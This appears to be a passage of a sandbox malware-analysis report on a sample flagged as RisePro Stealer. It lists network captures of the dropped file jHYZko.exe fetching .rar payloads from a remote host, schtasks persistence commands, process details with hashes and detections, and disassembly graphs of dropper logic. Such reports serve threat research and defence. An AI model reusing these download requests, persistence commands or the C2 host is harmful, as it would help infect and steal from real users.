                                4192.168.2.54972944.221.84.1057992516C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                TimestampBytes transferredDirectionData
                                Jul 25, 2024 05:10:32.504376888 CEST288OUTGET /cj//k2.rar HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                Host: ddos.dnsnb8.net:799
                                Connection: Keep-Alive


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                5192.168.2.54973044.221.84.1057992516C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                TimestampBytes transferredDirectionData
                                Jul 25, 2024 05:10:37.839843988 CEST288OUTGET /cj//k3.rar HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                Host: ddos.dnsnb8.net:799
                                Connection: Keep-Alive


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                6192.168.2.54973144.221.84.1057992516C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                TimestampBytes transferredDirectionData
                                Jul 25, 2024 05:10:40.968962908 CEST288OUTGET /cj//k4.rar HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                Host: ddos.dnsnb8.net:799
                                Connection: Keep-Alive


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                7192.168.2.54973244.221.84.1057992516C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                TimestampBytes transferredDirectionData
                                Jul 25, 2024 05:10:44.101511002 CEST288OUTGET /cj//k5.rar HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                Host: ddos.dnsnb8.net:799
                                Connection: Keep-Alive


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:0
                                Start time:23:09:53
                                Start date:24/07/2024
                                Path:C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe"
                                Imagebase:0xfb0000
                                File size:3'146'240 bytes
                                MD5 hash:EE50F2DB274C7ABDBAE3713A14020C24
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Borland Delphi
                                Yara matches:
                                • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:false

                                Target ID:1
                                Start time:23:09:53
                                Start date:24/07/2024
                                Path:C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                Imagebase:0xe60000
                                File size:15'872 bytes
                                MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 92%, ReversingLabs
                                • Detection: 90%, Virustotal, Browse
                                Reputation:moderate
                                Has exited:true

                                Target ID:3
                                Start time:23:09:55
                                Start date:24/07/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                                Imagebase:0x2d0000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:4
                                Start time:23:09:55
                                Start date:24/07/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:5
                                Start time:23:09:56
                                Start date:24/07/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
                                Imagebase:0x2d0000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:6
                                Start time:23:09:56
                                Start date:24/07/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:7
                                Start time:23:09:57
                                Start date:24/07/2024
                                Path:C:\ProgramData\MPGPH131\MPGPH131.exe
                                Wow64 process (32bit):true
                                Commandline:C:\ProgramData\MPGPH131\MPGPH131.exe
                                Imagebase:0x570000
                                File size:3'146'240 bytes
                                MD5 hash:EE50F2DB274C7ABDBAE3713A14020C24
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Borland Delphi
                                Yara matches:
                                • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 95%, ReversingLabs
                                • Detection: 86%, Virustotal, Browse
                                Reputation:low
                                Has exited:false

                                Target ID:8
                                Start time:23:09:58
                                Start date:24/07/2024
                                Path:C:\ProgramData\MPGPH131\MPGPH131.exe
                                Wow64 process (32bit):true
                                Commandline:C:\ProgramData\MPGPH131\MPGPH131.exe
                                Imagebase:0x570000
                                File size:3'146'240 bytes
                                MD5 hash:EE50F2DB274C7ABDBAE3713A14020C24
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:Borland Delphi
                                Yara matches:
                                • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:false

                                Target ID:11
                                Start time:23:10:02
                                Start date:24/07/2024
                                Path:C:\Windows\SysWOW64\WerFault.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 1612
                                Imagebase:0x5a0000
                                File size:483'680 bytes
                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:15
                                Start time:23:10:28
                                Start date:24/07/2024
                                Path:C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
                                Imagebase:0x8c0000
                                File size:3'146'240 bytes
                                MD5 hash:EE50F2DB274C7ABDBAE3713A14020C24
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:Borland Delphi
                                Yara matches:
                                • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: 0000000F.00000002.4457547906.00000000008C1000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 95%, ReversingLabs
                                • Detection: 86%, Virustotal, Browse
                                Reputation:low
                                Has exited:false

                                Target ID:16
                                Start time:23:10:28
                                Start date:24/07/2024
                                Path:C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Local\Temp\jHYZko.exe
                                Imagebase:0x1e0000
                                File size:15'872 bytes
                                MD5 hash:F7D21DE5C4E81341ECCD280C11DDCC9A
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate
                                Has exited:true

                                Target ID:18
                                Start time:23:10:46
                                Start date:24/07/2024
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2b7051ed.bat" "
                                Imagebase:0x790000
                                File size:236'544 bytes
                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:19
                                Start time:23:10:46
                                Start date:24/07/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:2.1%
                                  Dynamic/Decrypted Code Coverage:2.6%
                                  Signature Coverage:8.9%
                                  Total number of Nodes:305
                                  Total number of Limit Nodes:23
                                  execution_graph 22796 10adb48 53 API calls 3 library calls 22815 1090880 20 API calls 4 library calls 22798 fc4ab0 43 API calls std::locale::_Setgloballocale 22396 1018610 22397 1018657 22396->22397 22398 1018628 std::locale::_Setgloballocale 22396->22398 22401 101ba20 22397->22401 22400 101866a 22402 101ba45 22401->22402 22403 101bb6c 22401->22403 22406 101baa6 22402->22406 22407 101ba5a 22402->22407 22409 101bab3 22402->22409 22427 fb2040 41 API calls std::locale::_Setgloballocale 22403->22427 22405 101bb71 22428 fb1fa0 41 API calls 2 library calls 22405->22428 22406->22405 22406->22407 22416 108cd02 22407->22416 22411 108cd02 std::_Facet_Register 41 API calls 22409->22411 22414 101ba6a std::locale::_Init std::locale::_Setgloballocale 22409->22414 22411->22414 22415 101bb2a std::locale::_Init std::locale::_Setgloballocale 22414->22415 22429 1092220 39 API calls 2 library calls 22414->22429 22415->22400 22418 108cd07 22416->22418 22419 108cd21 22418->22419 22422 fb1fa0 Concurrency::cancel_current_task 22418->22422 22430 109b99c 22418->22430 22439 109f248 RtlEnterCriticalSection RtlLeaveCriticalSection std::_Facet_Register 22418->22439 22419->22414 22421 108cd2d 22421->22421 22422->22421 22437 108e96b RaiseException 22422->22437 22424 fb1fbc 22438 108e0c1 40 API calls ___std_exception_copy 22424->22438 22426 fb1fe3 22426->22414 22427->22405 22428->22414 22436 10a489d __Getctype 22430->22436 22431 10a48db 22441 109acaf 14 API calls __dosmaperr 22431->22441 22433 10a48c6 RtlAllocateHeap 22434 10a48d9 22433->22434 22433->22436 22434->22418 22436->22431 22436->22433 22440 109f248 RtlEnterCriticalSection RtlLeaveCriticalSection std::_Facet_Register 22436->22440 22437->22424 22438->22426 22439->22418 22440->22436 22441->22434 22442 1096658 22443 109666b ___std_exception_copy 22442->22443 22448 1096533 22443->22448 22445 1096677 22459 1091f4c 39 API calls ___std_exception_copy 22445->22459 22447 1096683 22449 109653f std::locale::_Setgloballocale 22448->22449 22450 1096549 22449->22450 22451 109656c 22449->22451 22475 1092193 39 API calls 2 library calls 22450->22475 22458 1096564 22451->22458 22460 109a800 RtlEnterCriticalSection 22451->22460 22454 109658a 22461 10965ca 22454->22461 22456 1096597 22476 10965c2 RtlLeaveCriticalSection 22456->22476 22458->22445 22459->22447 22460->22454 22462 10965fa 22461->22462 22463 10965d7 22461->22463 22465 10965f2 22462->22465 22477 1093041 22462->22477 22501 1092193 39 API calls 2 library calls 22463->22501 22465->22456 22471 1096626 22494 10a24af 22471->22494 22475->22458 22476->22458 22478 109305a 22477->22478 22482 1093081 22477->22482 22479 10a39f2 39 API calls 22478->22479 22478->22482 22480 1093076 22479->22480 22503 10a2dfb 22480->22503 22483 10a485d 22482->22483 22484 109661a 22483->22484 22485 10a4874 22483->22485 22487 10a39f2 22484->22487 22485->22484 22598 10a4823 14 API calls __dosmaperr 22485->22598 22488 10a39fe 22487->22488 22489 10a3a13 22487->22489 22599 109acaf 14 API calls __dosmaperr 22488->22599 22489->22471 22491 10a3a03 22600 1092210 39 API calls ___std_exception_copy 22491->22600 22493 10a3a0e 22493->22471 22495 10a24d8 22494->22495 22500 109662d 22494->22500 22496 10a2527 22495->22496 22498 10a24ff 22495->22498 22609 1092193 39 API calls 2 library calls 22496->22609 22601 10a241e 22498->22601 22500->22465 22502 10a4823 14 API calls __dosmaperr 22500->22502 22501->22465 22502->22465 22504 10a2e07 std::locale::_Setgloballocale 22503->22504 22505 10a2e48 22504->22505 22506 10a2e8e 22504->22506 22513 10a2e0f 22504->22513 22543 1092193 39 API calls 2 library calls 22505->22543 22514 10a7ed2 RtlEnterCriticalSection 22506->22514 22509 10a2e94 22510 10a2eb2 22509->22510 22515 10a2f0c 22509->22515 22544 10a2f04 RtlLeaveCriticalSection 22510->22544 22513->22482 22514->22509 22516 10a2f34 22515->22516 22542 10a2f57 22515->22542 22517 10a2f38 22516->22517 22519 10a2f93 22516->22519 22552 1092193 39 API calls 2 library calls 22517->22552 22523 10a2fb1 22519->22523 22553 109bbed 22519->22553 22545 10a2a51 22523->22545 22524 10a2fc9 22526 10a2ff8 22524->22526 22527 10a2fd1 22524->22527 22525 10a3010 22528 10a3079 WriteFile 22525->22528 22529 10a3024 22525->22529 22557 10a2622 53 API calls 3 library calls 22526->22557 22527->22542 22556 10a29e9 6 API calls 22527->22556 22531 10a309b GetLastError 22528->22531 22528->22542 22532 10a302c 22529->22532 22533 10a3065 22529->22533 22531->22542 22537 10a3051 22532->22537 22538 10a3031 22532->22538 22560 10a2ace 7 API calls _ValidateLocalCookies 22533->22560 22536 10a300b 22536->22542 22559 10a2c92 8 API calls 2 library calls 22537->22559 22540 10a303a 22538->22540 22538->22542 22558 10a2ba9 7 API calls _ValidateLocalCookies 22540->22558 22542->22510 22543->22513 22544->22513 22561 10ae7b4 22545->22561 22547 10a2ac7 22547->22524 22547->22525 22548 10a2a63 22548->22547 22549 10a2a91 22548->22549 22570 1097780 49 API calls 2 library calls 22548->22570 22549->22547 22551 10a2aab GetConsoleMode 22549->22551 22551->22547 22552->22542 22574 109bacc 22553->22574 22555 109bc06 22555->22523 22556->22542 22557->22536 22558->22542 22559->22536 22560->22536 22562 10ae7ce 22561->22562 22563 10ae7c1 22561->22563 22565 10ae7da 22562->22565 22572 109acaf 14 API calls __dosmaperr 22562->22572 22571 109acaf 14 API calls __dosmaperr 22563->22571 22565->22548 22567 10ae7c6 22567->22548 22568 10ae7fb 22573 1092210 39 API calls ___std_exception_copy 22568->22573 22570->22549 22571->22567 22572->22568 22573->22567 22580 10a814e 22574->22580 22576 109bade 22577 109bafa SetFilePointerEx 22576->22577 22579 109bae6 22576->22579 22578 109bb12 GetLastError 22577->22578 22577->22579 22578->22579 22579->22555 22581 10a815b 22580->22581 22582 10a8170 22580->22582 22593 109ac9c 14 API calls __dosmaperr 22581->22593 22586 10a8195 22582->22586 22595 109ac9c 14 API calls __dosmaperr 22582->22595 22585 10a8160 22594 109acaf 14 API calls __dosmaperr 22585->22594 22586->22576 22587 10a81a0 22596 109acaf 14 API calls __dosmaperr 22587->22596 22590 10a8168 22590->22576 22591 10a81a8 22597 1092210 39 API calls ___std_exception_copy 22591->22597 22593->22585 22594->22590 22595->22587 22596->22591 22597->22590 22598->22484 22599->22491 22600->22493 22602 10a242a std::locale::_Setgloballocale 22601->22602 22610 10a7ed2 RtlEnterCriticalSection 22602->22610 22604 10a2438 22606 10a2469 22604->22606 22611 10a2582 22604->22611 22624 10a24a3 RtlLeaveCriticalSection 22606->22624 22608 10a248c 22608->22500 22609->22500 22610->22604 22612 10a814e 39 API calls 22611->22612 22613 10a2592 22612->22613 22614 10a2598 22613->22614 22616 10a25ca 22613->22616 22617 10a814e 39 API calls 22613->22617 22625 10a80bd 15 API calls __dosmaperr 22614->22625 22616->22614 22618 10a814e 39 API calls 22616->22618 22619 10a25c1 22617->22619 22620 10a25d6 FindCloseChangeNotification 22618->22620 22621 10a814e 39 API calls 22619->22621 22620->22614 22622 10a25e2 GetLastError 22620->22622 22621->22616 22622->22614 22623 10a25f0 22623->22606 22624->22608 22625->22623 22803 101a190 52 API calls 22804 10add9b 51 API calls 3 library calls 22809 109abd8 74 API calls ___std_exception_copy 22626 10a379c GetLastError 22627 10a37b2 22626->22627 22630 10a37b8 22626->22630 22661 10a4e65 6 API calls std::_Lockit::_Lockit 22627->22661 22646 10a37bc SetLastError 22630->22646 22649 10a4ea4 22630->22649 22635 10a3802 22638 10a4ea4 __Getctype 6 API calls 22635->22638 22636 10a37f1 22637 10a4ea4 __Getctype 6 API calls 22636->22637 22639 10a37ff 22637->22639 22640 10a380e 22638->22640 22662 10a4823 14 API calls __dosmaperr 22639->22662 22641 10a3829 22640->22641 22642 10a3812 22640->22642 22663 10a3479 14 API calls __Getctype 22641->22663 22643 10a4ea4 __Getctype 6 API calls 22642->22643 22643->22639 22647 10a3834 22664 10a4823 14 API calls __dosmaperr 22647->22664 22665 10a4c52 22649->22665 22652 10a37d4 22652->22646 22654 10a3e63 22652->22654 22653 10a4ede TlsSetValue 22659 10a3e70 __Getctype 22654->22659 22655 10a3eb0 22674 109acaf 14 API calls __dosmaperr 22655->22674 22656 10a3e9b RtlAllocateHeap 22657 10a37e9 22656->22657 22656->22659 22657->22635 22657->22636 22659->22655 22659->22656 22673 109f248 RtlEnterCriticalSection RtlLeaveCriticalSection std::_Facet_Register 22659->22673 22661->22630 22662->22646 22663->22647 22664->22646 22666 10a4c82 22665->22666 22669 10a4c7e 22665->22669 22666->22669 22672 10a4b87 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary std::_Lockit::_Lockit 22666->22672 22668 10a4c96 22668->22669 22670 10a4c9c GetProcAddress 22668->22670 22669->22652 22669->22653 22670->22669 22671 10a4cac std::_Lockit::_Lockit 22670->22671 22671->22669 22672->22668 22673->22659 22674->22657 22675 1092dd0 22678 1092d0e 22675->22678 22681 1092d1a std::locale::_Setgloballocale 22678->22681 22679 1092d21 22703 109acaf 14 API calls __dosmaperr 22679->22703 22681->22679 22683 1092d41 22681->22683 22682 1092d26 22704 1092210 39 API calls ___std_exception_copy 22682->22704 22685 1092d53 22683->22685 22686 1092d46 22683->22686 22695 10a40f8 22685->22695 22705 109acaf 14 API calls __dosmaperr 22686->22705 22690 1092d70 22707 1092dae RtlLeaveCriticalSection 22690->22707 22691 1092d63 22706 109acaf 14 API calls __dosmaperr 22691->22706 22694 1092d31 22696 10a4104 std::locale::_Setgloballocale 22695->22696 22708 109d777 RtlEnterCriticalSection 22696->22708 22698 10a4112 22709 10a419c 22698->22709 22703->22682 22704->22694 22705->22694 22706->22694 22707->22694 22708->22698 22710 10a41bf 22709->22710 22711 10a4217 22710->22711 22718 10a411f 22710->22718 22725 109a800 RtlEnterCriticalSection 22710->22725 22726 109a814 RtlLeaveCriticalSection 22710->22726 22712 10a3e63 __Getctype 14 API calls 22711->22712 22713 10a4220 22712->22713 22727 10a4823 14 API calls __dosmaperr 22713->22727 22716 10a4229 22716->22718 22728 10a4ffd 6 API calls std::_Lockit::_Lockit 22716->22728 22722 10a4158 22718->22722 22719 10a4248 22729 109a800 RtlEnterCriticalSection 22719->22729 22730 109d7bf RtlLeaveCriticalSection 22722->22730 22724 1092d5c 22724->22690 22724->22691 22725->22710 22726->22710 22727->22716 22728->22719 22729->22718 22730->22724 22731 fcdb60 WSAStartup 22732 fcdc66 22731->22732 22734 fcdb98 22731->22734 22733 fcdbce getaddrinfo 22735 fcdc16 22733->22735 22736 fcdc60 WSACleanup 22733->22736 22734->22732 22734->22733 22737 fcdc74 FreeAddrInfoW 22735->22737 22738 fcdc24 socket 22735->22738 22736->22732 22737->22736 22739 fcdc80 22737->22739 22738->22736 22740 fcdc3a connect 22738->22740 22741 fcdc4c closesocket 22740->22741 22742 fcdc70 22740->22742 22741->22738 22743 fcdc56 FreeAddrInfoW 22741->22743 22742->22737 22743->22736 22806 fce460 81 API calls 22810 1269bc4 LoadStringA 22811 10ad1e1 50 API calls 3 library calls 22801 fc4a90 GetSystemTimePreciseAsFileTime GetSystemTimeAsFileTime __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __Xtime_get_ticks 22744 1ada000 22746 1ada044 GetPEB 22744->22746 22748 1ada077 CreateFileA 22746->22748 22749 1ada22d 22748->22749 22750 1ada265 22748->22750 22751 1ada246 WriteFile 22749->22751 22752 1ada244 22749->22752 22753 1ada255 FindCloseChangeNotification WinExec 22751->22753 22752->22753 22753->22750 22814 109a867 49 API calls ___std_exception_copy 22754 1096ba6 22755 1096bb9 ___std_exception_copy 22754->22755 22760 10968fd 22755->22760 22759 1096bdb 22762 1096909 std::locale::_Setgloballocale 22760->22762 22761 109690f 22782 1092193 39 API calls 2 library calls 22761->22782 22762->22761 22764 1096952 22762->22764 22772 109a800 RtlEnterCriticalSection 22764->22772 22766 109692a 22771 1091f4c 39 API calls ___std_exception_copy 22766->22771 22767 109695e 22773 1096a80 22767->22773 22769 1096974 22783 109699d RtlLeaveCriticalSection 22769->22783 22771->22759 22772->22767 22774 1096a93 22773->22774 22775 1096aa6 22773->22775 22774->22769 22784 10969a7 22775->22784 22777 1096b57 22777->22769 22778 1096ac9 22778->22777 22779 1093041 72 API calls 22778->22779 22780 1096af7 22779->22780 22781 109bbed 41 API calls 22780->22781 22781->22777 22782->22766 22783->22766 22785 1096a10 22784->22785 22786 10969b8 22784->22786 22785->22778 22786->22785 22788 109bbad 41 API calls ___std_exception_copy 22786->22788 22788->22785 22822 108bcf9 9 API calls 3 library calls 22812 10a1a3f 39 API calls 2 library calls 22792 1093b3f 11 API calls 22794 10ad930 50 API calls 3 library calls 22818 10bacb1 5 API calls _ValidateLocalCookies 22819 fb2540 51 API calls std::locale::_Init 22823 fb8b00 41 API calls ___std_exception_copy 22824 fca100 196 API calls 3 library calls

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 1ada044-1ada074 GetPEB 1 1ada077-1ada09a 0->1 2 1ada09d-1ada0a0 1->2 3 1ada1ee-1ada22b CreateFileA 2->3 4 1ada0a6-1ada0bc 2->4 28 1ada22d-1ada230 3->28 29 1ada265-1ada269 3->29 5 1ada0be-1ada0c5 4->5 6 1ada110-1ada116 4->6 5->6 7 1ada0c7-1ada0ce 5->7 9 1ada129-1ada12f 6->9 10 1ada118-1ada11f 6->10 7->6 11 1ada0d0-1ada0d7 7->11 13 1ada148-1ada14e 9->13 14 1ada131-1ada138 9->14 10->9 12 1ada121-1ada124 10->12 11->6 18 1ada0d9-1ada0dd 11->18 20 1ada1bb-1ada1c0 12->20 16 1ada167-1ada16f 13->16 17 1ada150-1ada157 13->17 14->13 15 1ada13a-1ada141 14->15 15->13 21 1ada143-1ada146 15->21 25 1ada188-1ada18e 16->25 26 1ada171-1ada178 16->26 17->16 24 1ada159-1ada160 17->24 18->6 27 1ada0df-1ada0e3 18->27 22 1ada1e0-1ada1e9 20->22 23 1ada1c2-1ada1c5 20->23 21->20 22->2 23->22 30 1ada1c7-1ada1ca 23->30 24->16 31 1ada162-1ada165 24->31 34 1ada1a7-1ada1ad 25->34 35 1ada190-1ada197 25->35 26->25 32 1ada17a-1ada181 26->32 27->20 33 1ada0e9-1ada10b 27->33 36 1ada232-1ada238 28->36 30->22 39 1ada1cc-1ada1cf 30->39 31->20 32->25 40 1ada183-1ada186 32->40 33->1 34->20 42 1ada1af-1ada1b6 34->42 35->34 41 1ada199-1ada1a0 35->41 37 1ada23a-1ada242 36->37 38 1ada246-1ada252 WriteFile 36->38 37->36 44 1ada244 37->44 45 1ada255-1ada262 FindCloseChangeNotification WinExec 38->45 39->22 46 1ada1d1-1ada1d4 39->46 40->20 41->34 48 1ada1a2-1ada1a5 41->48 42->20 43 1ada1b8 42->43 43->20 44->45 45->29 46->22 49 1ada1d6-1ada1d9 46->49 48->20 49->22 50 1ada1db-1ada1de 49->50 50->3 50->22
                                  APIs
                                  • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 01ADA223
                                  • WriteFile.KERNELBASE(00000000,FFFFDB4B,00003E00,?,00000000), ref: 01ADA252
                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 01ADA256
                                  • WinExec.KERNEL32(?,00000005), ref: 01ADA262
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$ChangeCloseCreateExecFindNotificationWrite
                                  • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$jHYZko.exe$lstr$odul
                                  • API String ID: 2234911746-2918638317
                                  • Opcode ID: b0741232f62294ee7c76ea7234fdb84e32d0b0c94cc463ad72419914e2c9c994
                                  • Instruction ID: 0425f0a3f13bba014969d6b7281055ff48f863a95e029a7a267b9dc5df1ea8f1
                                  • Opcode Fuzzy Hash: b0741232f62294ee7c76ea7234fdb84e32d0b0c94cc463ad72419914e2c9c994
                                  • Instruction Fuzzy Hash: EE612D75D01716DFCF25CFA8C884AAEFBB0BF45355F1582AAE506AB241C3709A81CB91

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 51 fcdb60-fcdb92 WSAStartup 52 fcdb98-fcdbc2 call fb7d20 * 2 51->52 53 fcdc66-fcdc6f 51->53 58 fcdbce-fcdc14 getaddrinfo 52->58 59 fcdbc4-fcdbc8 52->59 60 fcdc16-fcdc1c 58->60 61 fcdc60 WSACleanup 58->61 59->53 59->58 62 fcdc1e 60->62 63 fcdc74-fcdc7e FreeAddrInfoW 60->63 61->53 64 fcdc24-fcdc38 socket 62->64 63->61 65 fcdc80-fcdc88 63->65 64->61 66 fcdc3a-fcdc4a connect 64->66 67 fcdc4c-fcdc54 closesocket 66->67 68 fcdc70 66->68 67->64 69 fcdc56-fcdc5a FreeAddrInfoW 67->69 68->63 69->61
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
